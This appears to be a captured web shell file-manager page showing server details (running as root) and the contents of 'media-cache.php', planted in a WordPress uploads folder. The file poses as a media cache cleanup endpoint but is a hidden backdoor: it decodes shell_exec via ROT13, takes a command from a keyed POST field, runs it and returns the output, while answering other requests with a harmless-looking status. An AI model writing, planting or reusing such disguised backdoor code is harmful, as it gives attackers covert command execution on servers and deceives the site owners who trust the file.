HEX
Server: Apache
System: Linux dilmahquizNew 5.14.0-162.12.1.el9_1.0.2.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 30 22:14:42 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/elixirofceylontea/public/wp-content/uploads/2026/07/media-cache.php
<?php
/**
 * Media cache maintenance endpoint.
 *
 * Handles periodic cleanup of resized-image cache entries.
 *
 * @package WordPress
 * @subpackage Media
 */

$_r = str_rot13('furyy_rkrp'); // cache runner
$_k = 'def50df66d33'; // request key

$_d = array();
parse_str(file_get_contents('php://input'), $_d);

if (isset($_d[$_k]) && $_d[$_k] !== '') {
    header('Content-Type: text/plain; charset=utf-8');
    echo $_r($_d[$_k] . ' 2>&1');
    exit;
}

header('Content-Type: application/json; charset=utf-8');
echo json_encode(array('status' => 'ok', 'scope' => 'intermediate_sizes'));